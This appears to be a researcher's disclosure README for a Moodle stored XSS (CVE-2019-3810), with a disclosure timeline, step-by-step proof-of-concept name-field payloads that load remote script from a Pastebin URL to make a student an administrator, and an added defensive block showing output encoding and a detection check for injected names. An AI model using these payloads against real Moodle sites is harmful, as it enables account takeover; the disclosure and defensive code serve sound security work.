Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC for Privilege Escalation (Student to Admin)

Overview

Moodle CVE-2019-3810

This is one of the bugs that I discovered during a past pentest at an academic institution. It was successful enough at the time to practically steal admin access and gain complete control over Moodle using just one simple bug.

As the git history shows, the bug has existed since old versions of Moodle (2003) and was only patched in 2019.

Timeline:

  • December 2018 - Reported the bug to Moodle
  • January 2019 - Patch released
  • April 2021 - PoC disclosure

WARNING

FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THE EXPLOIT FOR ILLEGAL ACTIVITIES. THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.

PoC

  1. Upload payload.js to Pastebin or another similar service. Change the value of userid to your own ID. Let's say the URL is https://pastebin.com/raw/xxxxxxxx.
  2. Log in to your student account.
  3. Set first name with " style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement
  4. Set surname with ('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')
  5. Ask the administrator to open the /userpix/ page, or put a link to that page in your post and wait.

If successful, your account will be added as administrator.
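
A defender's view of the injection in steps 3 and 4, as an added example that is not part of the original README and is not Moodle's code. The `<img>` template, the function names and the sample users are assumptions; the block shows a name field breaking out of a double-quoted attribute, the same template with output encoding, and an audit check for stored names.

```javascript
// Added example, not Moodle's code. The <img> template is a hypothetical
// stand-in for a page that prints a user's full name inside a quoted attribute.

// Escape the characters that are significant in HTML text and quoted attributes.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// "Before": name fields are concatenated straight into the attribute value.
function renderUnsafe(first, last) {
  return `<img src="pix.php" alt="${first} ${last}">`;
}

// "After": same template, with output encoding applied at the sink.
function renderSafe(first, last) {
  return `<img src="pix.php" alt="${escapeHtml(first + ' ' + last)}">`;
}

// Attribute names a browser would see on one tag; user data must never add any.
function attributeNames(tag) {
  const re = /([^\s"'<>\/=]+)\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+)/g;
  return [...tag.matchAll(re)].map((m) => m[1].toLowerCase());
}

// Audit helper for stored profiles: flag names containing a double quote, angle
// bracket or inline event-handler pattern. Apostrophes alone are not flagged,
// because real surnames contain them.
function suspiciousNames(users) {
  const pattern = /["<>]|\bon\w+\s*=/i;
  return users.filter((u) => pattern.test(`${u.firstname} ${u.lastname}`)).map((u) => u.id);
}

// Constructed sample rows; id 7 is split across both fields as in steps 3 and 4.
const sampleUsers = [
  { id: 2, firstname: 'Ada', lastname: 'Lovelace' },
  { id: 7, firstname: '" onmouseover="x=1', lastname: ";y='2'" },
  { id: 9, firstname: 'Conan', lastname: "O'Brien" },
];

for (const u of sampleUsers) {
  console.log(u.id, attributeNames(renderUnsafe(u.firstname, u.lastname)),
    attributeNames(renderSafe(u.firstname, u.lastname)));
}
console.log('flagged ids:', suspiciousNames(sampleUsers));
```

The audit check is a triage aid for existing records; the encoding at the output sink is what closes the hole.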

Demonstration video

Owner
Fariskhi Vidyan
Computer & information security 🐱🐺 | IDN & SG